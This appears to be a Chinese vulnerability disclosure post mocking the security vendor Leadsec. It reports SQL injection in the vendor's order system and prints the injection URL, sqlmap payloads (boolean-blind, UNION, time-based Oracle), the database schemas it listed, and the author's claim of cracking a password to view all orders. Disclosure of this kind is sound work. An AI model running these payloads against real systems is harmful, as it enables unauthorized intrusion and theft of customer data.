网御星云--一个不安全的安全厂商
网御星云的电子订单管理系统,可以爆sql注入。ORACLE 数据库 成功列出,随便找了个用户,破了md5 加密 ,进入订单系统,所有订单一览无余。想问问你们,这个真的不重要吗,安全厂商……………………给你看注入点: http://agent.leadsec测试数据.cn/agent/countryProvinceChange.htm?currTime=Tue%20Jul%2001%202014%2009:15:09%20GMT+0800 POST参数:province=11
Place: POST Parameter: province Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: province=11' AND 7266=7266 AND 'mGhp'='mGhp Type: UNION query Title: Generic UNION query (NULL) - 2 columns Payload: province=11' UNION ALL SELECT CHR(113)||CHR(102)||CHR(113)||CHR(110)||CHR(113)||CHR(98)||CHR(86)||CHR(103)||CHR(105)||CHR(121)||CHR(109)||CHR(103)||CHR(115)||CHR(108)||CHR(122)||CHR(113)||CHR(122)||CHR(101)||CHR(116)||CHR(113),NULL FROM DUAL-- Type: AND/OR time-based blind Title: Oracle AND time-based blind (heavy query) Payload: province=11' AND 6075=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'gnDr'='gnDr --- [09:21:53] [INFO] the back-end DBMS is Oracle web application technology: Nginx, JSP back-end DBMS: Oracle >>>>>>>>>>>>>>>>>>>DATABASES>>>>>>>>>>>>>>>>>>>>>>>>>>>>> [*] CTXSYS [*] DBSNMP [*] EC_LEADSEC [*] EC_VENUS [*] EXFSYS [*] FLOWS_030000 [*] FLOWS_FILES [*] HR [*] IX [*] MDSYS [*] OE [*] OLAPSYS [*] ORDSYS [*] OUTLN [*] PM [*] SCOTT [*] SH [*] SOAU [*] SPPROD [*] SYS [*] SYSMAN [*] SYSTEM [*] TSMSYS [*] WK_TEST [*] WKSYS [*] WMSYS [*] XDB
修复方案:
你们是安全厂商呀。
查看更多关于网御星云第二集某重要业务系统爆出SQL注入Orac的详细内容...